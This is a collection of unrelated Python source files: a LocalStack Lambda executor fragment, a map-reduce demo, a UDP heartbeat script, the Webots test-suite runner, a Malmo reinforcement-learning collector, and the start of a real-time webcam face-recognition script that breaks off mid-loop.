        return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''

    @classmethod
    def get_java_classpath(cls, archive):
        """
        Return the Java classpath, using the parent folder of the
        given archive as the base folder.

        The result contains any *.jar files in the base folder, as
        well as any JAR files in the "lib/*" subfolder living
        alongside the supplied java archive (.jar or .zip).

        :param archive: an absolute path to a .jar or .zip Java archive
        :return: the Java classpath, relative to the base dir of "archive"
        """
        entries = ['.']
        base_dir = os.path.dirname(archive)
        for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/*.zip']:
            for entry in glob.glob(pattern % base_dir):
                # skip the archive itself; it is appended last (see below)
                if os.path.realpath(archive) != os.path.realpath(entry):
                    entries.append(os.path.relpath(entry, base_dir))
        # make sure to append the localstack-utils.jar at the end of the classpath
        # https://github.com/localstack/localstack/issues/1160
        entries.append(os.path.relpath(archive, base_dir))
        result = ':'.join(entries)
        return result
# --------------
# GLOBAL STATE
# --------------
# Singleton executor instances; selected at runtime via the LAMBDA_EXECUTOR
# config variable (see AVAILABLE_EXECUTORS below).
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
# one fresh container per invocation is the default strategy
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
    'local': EXECUTOR_LOCAL,
    'docker': EXECUTOR_CONTAINERS_SEPARATE,
    'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
classmethod_demo.py | """
@author: magician
@date: 2019/12/24
@file: classmethod_demo.py
"""
import os
from threading import Thread
TEMP_DIR = '/home/magician/Project/python3/data/1.txt'
class InputData(object):
    """Abstract source of raw input data.

    Subclasses must implement read() and return the full content as a string.
    """

    def read(self):
        """Return the raw data; abstract in this base class."""
        raise NotImplementedError
class PathInputData(InputData):
    """InputData backed by a file on disk."""

    def __init__(self, path):
        super().__init__()
        # path to the file this instance reads from
        self.path = path

    def read(self):
        """Return the entire file content as a string.

        Bug fix: the original used ``open(self.path).read()`` without closing,
        leaking the file handle; a ``with`` block guarantees it is closed.
        """
        with open(self.path) as source:
            return source.read()
class Worker(object):
    """Abstract map-reduce worker bound to a single InputData instance.

    Subclasses implement map() (populate ``result`` from the input) and
    reduce(other) (fold another worker's result into this one).
    """

    def __init__(self, input_data):
        # the InputData this worker consumes
        self.input_data = input_data
        # populated by map(); None until then
        self.result = None

    def map(self):
        """Compute this worker's partial result; abstract here."""
        raise NotImplementedError

    def reduce(self, other):
        """Merge *other*'s result into this worker; abstract here."""
        raise NotImplementedError
class LineCountWorker(Worker):
    """Worker that counts newline characters in its input data."""

    def map(self):
        """Read the input and store the number of '\n' characters in result."""
        self.result = self.input_data.read().count('\n')

    def reduce(self, other):
        """Add *other*'s line count onto this worker's result."""
        self.result = self.result + other.result
def generate_inputs(data_dir):
    """Lazily yield one PathInputData per directory entry in *data_dir*.

    :param data_dir: directory whose entries become inputs
    :return: generator of PathInputData objects
    """
    for entry in os.listdir(data_dir):
        yield PathInputData(os.path.join(data_dir, entry))
def create_workers(input_list):
    """Build one LineCountWorker per input item.

    :param input_list: iterable of InputData objects
    :return: list of LineCountWorker instances
    """
    return [LineCountWorker(input_data) for input_data in input_list]
def execute(workers):
    """Run every worker's map() step in a parallel thread, then fold all
    results into the first worker via reduce().

    :param workers: non-empty list of Worker-like objects exposing map() and
        reduce(other)
    :return: the combined ``result`` of the first worker
    """
    threads = [Thread(target=w.map) for w in workers]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()

    first, rest = workers[0], workers[1:]
    # Bug fix: fold only the *remaining* workers into the first one. The
    # original iterated over ``workers``, so it called first.reduce(first)
    # and double-counted the first worker's own result.
    for worker in rest:
        first.reduce(worker)
    return first.result
def mapreduce(data_dir):
    """Full pipeline: enumerate inputs under *data_dir*, build workers, run them.

    :param data_dir: directory containing the input files
    :return: the combined result of all workers
    """
    return execute(create_workers(generate_inputs(data_dir)))
def write_test_files(tmpdir):
    """Placeholder fixture writer: currently a no-op that echoes *tmpdir* back.

    :param tmpdir: target location for test files (returned unchanged)
    :return: *tmpdir*
    """
    # os.write(['111'])
    return tmpdir
class GenericInputData(object):
    """Abstract input with a classmethod factory for config-driven construction.

    Subclasses implement read() plus the generate_inputs(config) alternate
    constructor.
    """

    def read(self):
        """Return the raw data; abstract in this base class."""
        raise NotImplementedError

    @classmethod
    def generate_inputs(cls, config):
        """Yield instances described by *config*; abstract in this base class."""
        raise NotImplementedError
# class PathInputData(GenericInputData):
# """
# PathInputData
# """
# def read(self):
# return open(self.path).read()
#
# @classmethod
# def generate_inputs(cls, config):
# data_dir = config['data_dir']
# for name in os.listdir(data_dir):
# yield cls(os.path.join(data_dir, name))
# class GenericWorker(object):
# """
# GenericWorker
# """
# def map(self):
# raise NotImplementedError
#
# def reduce(self, other):
# raise NotImplementedError
#
# @classmethod
# def create_workers(cls, input_class, config):
# workers = []
#
# for input_data in input_class.generate_inputs(config):
# workers.append(cls(input_data))
#
# return workers
# def mapreduce(worker_class, input_class, config):
# """
# mapreduce
# :param worker_class:
# :param input_class:
# :param config:
# :return:
# """
# workers = worker_class.create_workers(input_class, config)
#
# return execute(workers)
if __name__ == '__main__':
    # Bug fix: mapreduce() expects a directory *path* (it calls os.listdir),
    # but the original opened TEMP_DIR and passed the file object, which
    # raises a TypeError.  Use the directory containing TEMP_DIR instead.
    data_dir = os.path.dirname(TEMP_DIR)
    write_test_files(data_dir)
    result = mapreduce(data_dir)
    print('There are', result, 'lines')
# with open(TEMP_DIR) as tmpdir:
# write_test_files(tmpdir)
# result = mapreduce(LineCountWorker, PathInputData, config)
|
HB.py | #!/usr/bin
import socket
import time
from threading import Thread
my_ip="192.168.1.14"
neighbours = ["192.168.1.19"]
nodecount=len(neighbours)
PORT = 5002
MESSAGE = "alive"
print "UDP target IP:", neighbours
print "UDP target port:", PORT
print "message:", MESSAGE
def pulse():
    """Send an 'alive' UDP datagram to every neighbour, once per second, forever."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        for idx, node in enumerate(neighbours):
            sock.sendto(MESSAGE, (node, PORT))
            print("Alive sent to " + str(idx))
        time.sleep(1)
def sense():
    """Listen for neighbour heartbeats on PORT and print an acknowledgement
    for each 'alive' datagram received."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((my_ip, PORT))
    while True:
        data, addr = sock.recvfrom(1024)
        # couldn't figure out finding dead node
        if data == 'alive':
            # Bug fix: the original printed the undefined name 'address'
            # (NameError on the first heartbeat); the sender's address is
            # bound to 'addr' above.
            print("OK " + str(addr))
'''def adapt(dir):
print("node "+str(dir)+" failed")'''
def initHB():
    """Start the heartbeat sender thread, then (after a short grace period)
    the listener thread."""
    sender = Thread(target=pulse)
    listener = Thread(target=sense)
    sender.start()
    time.sleep(1)
    listener.start()
'''if __name__== "__main__":
initHB()'''
|
test_suite.py | #!/usr/bin/env python
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite."""
import sys
import os
import shutil
import platform
import datetime
import getpass
import glob
import subprocess
import threading
import time
import multiprocessing
from command import Command
# monitor failures
failures = 0

# parse arguments
filesArguments = []   # explicit world files passed on the command line
nomakeOption = False  # --nomake: skip the 'make release' build step
ansiEscape = True     # --no-ansi-escape: disable ANSI colors in tail output
if len(sys.argv) > 1:
    for arg in sys.argv[1:]:
        if arg == '--nomake':
            nomakeOption = True
        elif arg == '--no-ansi-escape':
            ansiEscape = False
        elif os.path.exists(arg):
            # any existing path is treated as a world file to test
            filesArguments.append(arg)
        else:
            raise RuntimeError('Unknown option "' + arg + '"')

# the test groups, each mapping to a subdirectory of the tests folder
testGroups = ['api', 'physics', 'protos', 'parser', 'rendering']

# global files
testsFolderPath = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep
outputFilename = testsFolderPath + 'output.txt'
defaultProjectPath = testsFolderPath + 'default' + os.sep
supervisorControllerName = 'test_suite_supervisor'
protoFileNames = ['TestSuiteSupervisor.proto', 'TestSuiteEmitter.proto']
tempWorldCounterFilename = testsFolderPath + 'world_counter.txt'
webotsStdOutFilename = testsFolderPath + 'webots_stdout.txt'
webotsStdErrFilename = testsFolderPath + 'webots_stderr.txt'

# Webots setup (cf. setupWebots() below)
webotsFullPath = ''
webotsVersion = ''
def setupWebots():
    """Find webots binary thanks to WEBOTS_HOME.

    Locates the binary per platform, then queries it for its version and
    system information, storing them in module globals.  Exits with code 1
    if the binary cannot be found.
    """
    # NOTE(review): os.putenv passes the variables to child processes but does
    # not update os.environ in this process -- presumably intentional since
    # only the launched Webots needs them; confirm.
    os.putenv('WEBOTS_TEST_SUITE', 'TRUE')
    os.putenv('WEBOTS_EMPTY_PROJECT_PATH', defaultProjectPath)
    global webotsFullPath
    global webotsVersion
    global webotsSysInfo
    if sys.platform == 'win32':
        webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + 'msys64' + \
            os.sep + 'mingw64' + os.sep + 'bin' + os.sep + 'webots.exe'
    else:
        webotsBinary = 'webots'
        if 'WEBOTS_HOME' in os.environ:
            webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + webotsBinary
        else:
            webotsFullPath = '..' + os.sep + '..' + os.sep + webotsBinary
    if not os.path.isfile(webotsFullPath):
        print('Error: ' + webotsBinary + ' binary not found')
        if sys.platform == 'win32':
            sys.stdout.flush()
        sys.exit(1)
    webotsFullPath = os.path.normpath(webotsFullPath)

    # query the binary for its version ...
    command = Command(webotsFullPath + ' --version')
    command.run()
    if command.returncode != 0:
        raise RuntimeError('Error when getting the Webots version')
    webotsVersion = command.output.replace('\n', ' ').split(' ')[2].split('.')

    # ... and for the system information lines
    command = Command(webotsFullPath + ' --sysinfo')
    command.run()
    if command.returncode != 0:
        raise RuntimeError('Error when getting the Webots information of the system')
    webotsSysInfo = command.output.split('\n')
def findFirstWorldFilename(worldsFilename):
    """Return the first world file name listed in *worldsFilename*.

    :param worldsFilename: path to the worlds list file (one path per line)
    :return: the first line, stripped of surrounding whitespace
    """
    with open(worldsFilename) as listing:
        return listing.readline().strip()
def resetIndexFile(indexFilename):
    """(Re)create the per-group world index file, starting at world 0.

    :param indexFilename: path of the index file to overwrite
    """
    with open(indexFilename, 'w') as index_file:
        index_file.write('0\n')
def formatString(s):
    """Add a predefined number of spaces after the ':' character.

    The label before the first ': ' is left-padded to 20 columns; strings
    without ': ' are returned unchanged.
    """
    try:
        cut = s.index(': ')
    except ValueError:  # no ': ' separator present
        return s
    return '{:<20}'.format(s[:cut]) + s[cut:]
def resetOutputFile():
    """Start a fresh output file containing the environment/version header."""
    with open(outputFilename, 'w') as out:
        out.write(formatString('Webots binary: ' + webotsFullPath) + '\n')
        out.write(formatString('Webots version: ' + str(webotsVersion)) + '\n')
        out.write(formatString(
            'Operating System: ' + platform.platform() +
            ' [' + platform.machine() + '] ' + platform.processor() +
            ' (' + platform.node() + ')') + '\n'
        )
        out.write(formatString('Date: ' + datetime.datetime.now().ctime()) + '\n')
        out.write(formatString('Tester: ' + getpass.getuser()) + '\n')
        for info_line in webotsSysInfo:
            out.write(formatString(info_line) + '\n')
def appendToOutputFile(txt):
    """Append *txt* verbatim to the global output file.

    :param txt: text to append (no newline is added)
    """
    with open(outputFilename, 'a') as out:
        out.write(txt)
def executeMake():
    """Execute 'make release' to ensure every controller/plugin is compiled.

    Runs from the WEBOTS_HOME/tests directory and restores the previous
    working directory afterwards; raises RuntimeError on a non-zero exit.
    """
    curdir = os.getcwd()
    os.chdir(os.path.join(os.environ['WEBOTS_HOME'], 'tests'))
    # parallelize the build across all available cores
    command = Command('make release -j%d' % multiprocessing.cpu_count())
    command.run(silent=False)
    os.chdir(curdir)
    if command.returncode != 0:
        raise RuntimeError('Error when executing the Make command')
def generateWorldsList(groupName, worldsFilename):
    """Generate the list of worlds to run for *groupName* into *worldsFilename*.

    :param groupName: test group name (e.g. 'api', 'physics', ...)
    :param worldsFilename: path of the list file to write (one world per line)
    :return: number of world files actually written to the list
    """
    worldsCount = 0
    with open(worldsFilename, 'w') as f:
        # generate the list from the arguments
        if filesArguments:
            for file in filesArguments:
                if file.startswith(groupName):
                    f.write(file + '\n')
                    # Bug fix: count only the worlds actually written; the
                    # original used len(filesArguments), over-counting when
                    # the arguments span several test groups.
                    worldsCount += 1
        # generate the list from 'ls worlds/*.wbt'
        else:
            filenames = glob.glob(testsFolderPath + groupName + os.sep + 'worlds' + os.sep + '*.wbt')
            # remove the generic name
            # Bug fix: the original removed items from `filenames` while
            # iterating over it, which skips elements; filter into a new list.
            filenames = [name for name in filenames if not name.endswith('test_suite')]
            # alphabetical order
            filenames.sort()
            # to file
            for filename in filenames:
                # speaker test not working on travis because of missing sound drivers
                if not filename.endswith('_temp.wbt') and not ('TRAVIS' in os.environ and filename.endswith('speaker.wbt')):
                    f.write(filename + '\n')
                    worldsCount += 1
    return worldsCount
def monitorOutputFile(finalMessage):
    """Display the output file on the console.

    Streams the output file with 'tail -f' until *finalMessage* appears;
    the running Command is stored in a global so the main script can
    terminate it once the suite is done.
    """
    global monitorOutputCommand
    monitorOutputCommand = Command('tail -f ' + outputFilename, ansiEscape)
    monitorOutputCommand.run(expectedString=finalMessage, silent=False)
# ---- main script: build, launch Webots per test group, collect results ----
if not nomakeOption:
    executeMake()
setupWebots()
resetOutputFile()

# background thread that mirrors the output file to the console until the
# final message is written
finalMessage = 'Test suite complete'
thread = threading.Thread(target=monitorOutputFile, args=[finalMessage])
thread.start()

webotsArguments = '--mode=fast --stdout --stderr --minimize --batch'
if sys.platform != 'win32':
    webotsArguments += ' --no-sandbox'

for groupName in testGroups:
    testFailed = False
    appendToOutputFile('\n### ' + groupName + ' test\n\n')
    # clear stdout and stderr files
    open(webotsStdErrFilename, 'w').close()
    open(webotsStdOutFilename, 'w').close()
    worldsFilename = testsFolderPath + groupName + os.sep + 'worlds.txt'
    indexFilename = testsFolderPath + groupName + os.sep + 'worlds_index.txt'
    # init temporary world counter file
    tempFile = open(tempWorldCounterFilename, 'w')
    tempFile.write('0')
    tempFile.close()
    # copy the shared supervisor controller into this group's project
    supervisorTargetDirectory = testsFolderPath + groupName + os.sep + 'controllers' + os.sep + \
        supervisorControllerName
    if not os.path.exists(supervisorTargetDirectory):
        os.makedirs(supervisorTargetDirectory)
    shutil.copyfile(
        defaultProjectPath + 'controllers' + os.sep +
        supervisorControllerName + os.sep +
        supervisorControllerName + '.py',
        supervisorTargetDirectory + os.sep + supervisorControllerName + '.py'
    )
    # parser tests uses a slightly different Supervisor PROTO
    protosTargetDirectory = testsFolderPath + groupName + os.sep + 'protos'
    protosSourceDirectory = defaultProjectPath + 'protos' + os.sep
    if not os.path.exists(protosTargetDirectory):
        os.makedirs(protosTargetDirectory)
    for protoFileName in protoFileNames:
        shutil.copyfile(protosSourceDirectory + protoFileName,
                        protosTargetDirectory + os.sep + protoFileName)
    worldsCount = generateWorldsList(groupName, worldsFilename)
    firstSimulation = findFirstWorldFilename(worldsFilename)
    # nothing to run for this group (empty worlds list)
    if not os.path.exists(firstSimulation):
        continue
    resetIndexFile(indexFilename)
    # Here is an example to run webots in gdb and display the stack
    # when it crashes.
    # this is particuarliy useful to debug on the jenkins server
    # command = Command('gdb -ex run --args ' + webotsFullPath + '-bin ' +
    #                   firstSimulation + ' --mode=fast --minimize')
    # command.run(silent = False)
    command = Command(webotsFullPath + ' ' + firstSimulation + ' ' + webotsArguments)
    # redirect stdout and stderr to files
    command.runTest(timeout=10 * 60)  # 10 minutes
    if command.isTimeout or command.returncode != 0:
        if command.isTimeout:
            failures += 1
            appendToOutputFile(
                'FAILURE: Webots has been terminated ' +
                'by the test suite script\n')
        else:
            failures += 1
            appendToOutputFile(
                'FAILURE: Webots exits abnormally with this error code: ' +
                str(command.returncode) + '\n')
        testFailed = True
    else:
        # check count of executed worlds
        tempFile = open(tempWorldCounterFilename)
        counterString = tempFile.read()
        tempFile.close()
        if int(counterString) < worldsCount:
            testFailed = True
            appendToOutputFile('FAILURE: Some tests have not been executed\n')
            appendToOutputFile('- expected number of worlds: %d\n' % (worldsCount))
            appendToOutputFile('- number of worlds actually tested: %s)\n' % (counterString))
        else:
            with open(webotsStdErrFilename, 'r') as file:
                if 'Failure' in file.read():
                    failures += 1
    if testFailed:
        # dump the full Webots logs into the output file for diagnosis
        appendToOutputFile('\nWebots complete STDOUT log:\n')
        with open(webotsStdOutFilename) as f:
            for line in f:
                appendToOutputFile(line)
        appendToOutputFile('\nWebots complete STDERR log:\n')
        with open(webotsStdErrFilename) as f:
            for line in f:
                appendToOutputFile(line)
                if '(core dumped)' in line:
                    # extract the crashed PID from the shell's segfault line
                    # and, if present, append a gdb backtrace of the core dump
                    l = line[0:line.find(' Segmentation fault')]
                    pid = int(l[l.rfind(' ') + 1:])
                    core_dump_file = '/tmp/core_webots-bin.' + str(pid)
                    if os.path.exists(core_dump_file):
                        appendToOutputFile(subprocess.check_output([
                            'gdb', '--batch', '--quiet', '-ex', 'bt', '-ex',
                            'quit', '../bin/webots-bin', core_dump_file
                        ]))
                        os.remove(core_dump_file)
                    else:
                        appendToOutputFile(
                            'Cannot get the core dump file: "%s" does not exist.' % core_dump_file
                        )

appendToOutputFile('\n' + finalMessage + '\n')
time.sleep(1)
if monitorOutputCommand.isRunning():
    monitorOutputCommand.terminate(force=True)

with open(outputFilename, 'r') as file:
    content = file.read()
    # NOTE(review): this counts 'FAILURE ' (with a trailing space), but the
    # messages written above all use 'FAILURE:' -- so this likely never
    # matches; confirm whether 'FAILURE:' was intended.
    failures += content.count('FAILURE ')
sys.exit(failures)
|
collect_transitions.py | # Village People, 2017
#
# !! ATTENTION: IPS are written below and they not taken from some
# !! Fancy yaml file !!
import torch
import torch.multiprocessing as mp
from multiprocessing import Queue
from copy import deepcopy
from termcolor import colored as clr
from utils import read_config
from models import get_model
from worker_scripts import collect_from_malmo, train_from_malmo
from worker_scripts import predict_for_malmo
# When True, a dedicated predictor process answers action queries for all
# collectors; when False each collector runs its own model forward pass.
USE_PREDICTOR = False

# Hard-coded machines running Malmo, as warned in the file header: each entry
# is (ip, [(port_a, port_b), ...]) where every port pair hosts two agents.
# The commented-out groups below are previously-used lab configurations kept
# for quick switching (labels translated: "four", "eight", "twelve",
# "eighteen", "all").
LAN_IPS = [
    # Only four
    # ("172.19.3.173", [(10000, 10001)]),
    # ("172.19.3.236", [(10000, 10001)]),
    # ("172.19.3.232", [(10000, 10001)]),
    # ("172.19.3.234", [(10000, 10001)]),
    # Only eight
    # ("172.19.3.173", [(10000, 10001)]),
    # ("172.19.3.236", [(10000, 10001)]),
    # ("172.19.3.232", [(10000, 10001)]),
    # ("172.19.3.234", [(10000, 10001)]),
    # ("172.19.3.234", [(10000, 10001)]),
    # ("172.19.3.230", [(10000, 10001)]),
    # ("172.19.3.229", [(10000, 10001)]),
    # ("172.19.3.240", [(10000, 10001)]),
    # ("172.19.3.240", [(10000, 10001)]),
    # Twelve
    # ("172.19.3.173", [(10000, 10001)]),
    # ("172.19.3.236", [(10000, 10001)]),
    # ("172.19.3.232", [(10000, 10001)]),
    # ("172.19.3.234", [(10000, 10001)]),
    # ("172.19.3.234", [(10000, 10001)]),
    # ("172.19.3.230", [(10000, 10001)]),
    # ("172.19.3.229", [(10000, 10001)]),
    # ("172.19.3.240", [(10000, 10001)]),
    # ("172.19.3.240", [(10000, 10001)]),
    #
    # ("172.19.3.196", [(10000, 10001), (10002, 10003)]),
    # ("172.19.3.201", [(10000, 10001), (10002, 10003)]),
    # Eighteen
    # ("172.19.3.173", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.236", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.235", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.232", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.234", [(10000, 10001), (10002, 10003), (10004, 10005)])
    # ("172.19.3.173", [(10000, 10001), (10002, 10003), (10004, 10005)])
    # All
    # Local host
    ("192.168.0.100", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    ("192.168.0.102", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    ("192.168.0.101", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.209", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.240", [(10000, 10001), (10002, 10003), (10004, 10005)])
    # ("172.19.3.173", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.236", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.232", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.234", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.230", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.229", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # #
    # ("172.19.3.240", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.196", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # ("172.19.3.201", [(10000, 10001), (10002, 10003), (10004, 10005)]),
    # # ("172.19.3.189", [(10000, 10001)]),
    # ("172.19.3.208", [(10000, 10001)]),
    # ("172.19.3.190", [(10000, 10001)])
]

# Flatten LAN_IPS: one HOSTS entry per port pair, holding the two
# (ip, port) endpoints a single collector will drive.
HOSTS = []
for ip, pairs in LAN_IPS:
    HOSTS.extend([[(ip, p1), (ip, p2)] for (p1, p2) in pairs])
def print_info(message):
    """Print *message* to stdout behind a yellow [COLLECT-MAIN] tag."""
    tag = clr("[COLLECT-MAIN] ", "yellow")
    print(tag + message)
def immortal_collector(_id, shared_objects, cfg):
    """Keep a Malmo collector alive forever.

    Re-shares the model's memory and spawns a fresh collector process each
    time the previous one terminates, so a crashed collector is restarted
    immediately.

    Arguments:
      _id: integer worker id passed through to collect_from_malmo.
      shared_objects: dict of cross-process shared state (must contain
        a "model" entry supporting share_memory()).
      cfg: configuration namespace for the worker.
    """
    while True:
        shared_objects["model"].share_memory()
        worker = mp.Process(target=collect_from_malmo,
                            args=(_id, shared_objects, cfg))
        worker.start()
        worker.join()
# Entry point: wire up the shared model, an optional predictor process,
# one collector process per HOSTS entry, and a single trainer process.
if __name__ == "__main__":
    print_info("Booting...")
    cfg = read_config()

    # -- Configure Torch: seed RNGs (0 or negative seed means "don't seed").
    if cfg.general.seed > 0:
        torch.manual_seed(cfg.general.seed)
        if cfg.general.use_cuda:
            torch.cuda.manual_seed_all(cfg.general.seed)
    if cfg.general.use_cuda:
        print_info("Using CUDA.")
    else:
        print_info("No GPU for you, Sir!")
    # "spawn" start method is required for sharing CUDA tensors across
    # processes.
    mp.set_start_method("spawn")
    print_info("Torch setup finished.")

    # -- Configure model: instantiate, move to GPU if requested, and place
    # its parameters in shared memory so all processes see the same weights.
    shared_model = get_model(cfg.model.name)(cfg.model)
    if cfg.general.use_cuda:
        shared_model.cuda()
    shared_model.share_memory()
    print_info("Shared model {:s} initalized.".format(
        clr(cfg.model.name, "red"))
    )
    # Optionally resume from a checkpoint path given in the config.
    if isinstance(cfg.model.load, str):
        checkpoint = torch.load(cfg.model.load)
        iteration = checkpoint['iteration']
        reward = checkpoint['reward']
        print("LOADING MODEL: {} ---> MAX R: {}".format(cfg.model.load, reward))
        shared_model.load_state_dict(checkpoint['state_dict'])
    #
    # -- Shared objects passed to every worker process.
    shared_objects = {
        "model": shared_model,
        "queue": mp.Queue(),
        "reset": mp.Value("i", 0),
        "session": mp.Value("i", 0)
    }

    # -- Create predictor (disabled by default; see USE_PREDICTOR).
    if USE_PREDICTOR:
        # NOTE(review): mp.Pipe() returns two Connection endpoints, not
        # queues — the recv_queues/send_queues names are misleading; verify
        # which end each worker is expected to use.
        recv_queues, send_queues = {}, {}
        for i in range(len(HOSTS)):
            recv_queues[i], send_queues[i] = mp.Pipe()
        shared_objects["send_back_queues"] = send_queues
        shared_objects["predict_queue"] = mp.Queue()
        predictor = mp.Process(target=predict_for_malmo,
                               args=(shared_objects, deepcopy(cfg)))

    # -- Create players: one collector per host entry; each gets its own
    # deep copy of the config with that host's Malmo ports patched in.
    collectors = []
    for _id, hosts in enumerate(HOSTS):
        cfg.envs.minecraft.ports = hosts
        cfg.agent.mode = "collect"
        if USE_PREDICTOR:
            # NOTE(review): the whole recv_queues dict is handed to every
            # collector (not just entry _id) — confirm this is intended.
            shared_objects["answer_pipe"] = recv_queues
        collector = mp.Process(target=collect_from_malmo,
                               args=(_id, shared_objects, deepcopy(cfg)))
        collectors.append(collector)

    # -- Create trainer that consumes transitions from the shared queue.
    cfg.agent.mode = "train_from_queue"
    trainer = mp.Process(target=train_from_malmo, args=(shared_objects, cfg))

    # -- Start all
    if USE_PREDICTOR:
        predictor.start()
    for c in collectors:
        c.start()
    trainer.start()

    # -- Finished. NOTE(review): the predictor process is never joined.
    trainer.join()
    for c in collectors:
        c.join()
    print_info("Done")
|
real_time_face_recognition.py | # coding=utf-8
"""Performs face detection in realtime.
Based on code from https://github.com/shanren7/real_time_face_recognition
"""
# MIT License
#
# Copyright (c) 2017 François Gervais
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import sys
import time
import cv2
from threading import Thread
import face
import memcache
# Recognizer instance; created lazily in main().
face_recognition = None
# Latest detection result, written by the background recognition thread
# and read by the display loop.
face_det = None
# Shared memcache client used to publish the currently-detected name to
# other processes under the key 'Name'.
current_detected = memcache.Client(['127.0.0.1:11211'], debug=0)
def add_overlays(frame, faces, frame_rate):
    """Draw the best detection and the frame rate onto *frame*.

    Only the first detection in *faces* is drawn: its bounding box, the
    recognized name (blanked when confidence <= 0.85), and the confidence
    percentage. The name is also published to the shared memcache client
    under the key 'Name' so other processes can query the current person;
    it is cleared when no face is in view. The fps counter is always drawn.

    Arguments:
      frame: image (numpy array) drawn on in place.
      faces: list of detections exposing .bounding_box, .name and
        .confidence, or None when no detection pass has completed yet.
      frame_rate: frames-per-second value to display.
    """
    # Cleanup vs. original: removed ~20 lines of commented-out code that
    # duplicated this logic for all faces, and an unused `global face_det`
    # declaration (this function never references face_det).
    if faces is not None:
        if len(faces) > 0:
            best = faces[0]
            face_bb = best.bounding_box.astype(int)
            cv2.rectangle(frame,
                          (face_bb[0], face_bb[1]), (face_bb[2], face_bb[3]),
                          (0, 0, 0), 1)
            if best.name is not None:
                # Treat low-confidence matches as "unknown".
                if best.confidence <= 0.85:
                    best.name = ''
                current_detected.set('Name', best.name)
                cv2.putText(frame, best.name, (face_bb[0], face_bb[3]),
                            cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0),
                            thickness=2, lineType=2)
                cv2.putText(frame, (best.confidence * 100).astype(str) + "%",
                            (face_bb[0], face_bb[1]),
                            cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0),
                            thickness=2, lineType=2)
        else:
            # No face in view: clear the published name.
            current_detected.set('Name', '')
    cv2.putText(frame, str(frame_rate) + " fps", (10, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0),
                thickness=2, lineType=2)
def main(args):
    """Run the realtime webcam loop.

    Captures frames, kicks off face identification on a background thread
    every `frame_interval` frames, draws overlays, and handles keyboard
    commands: 'q' quits, 'r' retrains the encoder, 'd' prints the current
    person.
    """
    global face_recognition
    global face_det
    frame_interval = 2  # Number of frames after which to run face detection
    fps_display_interval = 3  # seconds
    frame_rate = 0
    frame_count = 0

    video_capture = cv2.VideoCapture(0)  # default camera
    face_recognition = face.Recognition()
    start_time = time.time()
    # Property id 28 corresponds to CAP_PROP_FOCUS — presumably this
    # disables autofocus; TODO confirm on the target OpenCV build.
    video_capture.set(28, 0)
    #if args.debug:
    while True:
        # Capture frame-by-frame
        ret, frame = video_capture.read()
        #img = cv2.imread(frame)
        # Run recognition off-thread so the capture loop stays responsive;
        # results land in the module-level face_det.
        if (frame_count % frame_interval) == 0:
            Thread(target=face_reg_wrapper,
                   args=(frame, )
                   ).start()
            #print(face_det)
            #faces = face_recognition.identify(frame)
        # Check our current fps
        end_time = time.time()
        if (end_time - start_time) > fps_display_interval:
            frame_rate = int(frame_count / (end_time - start_time))
            start_time = time.time()
            frame_count = 0
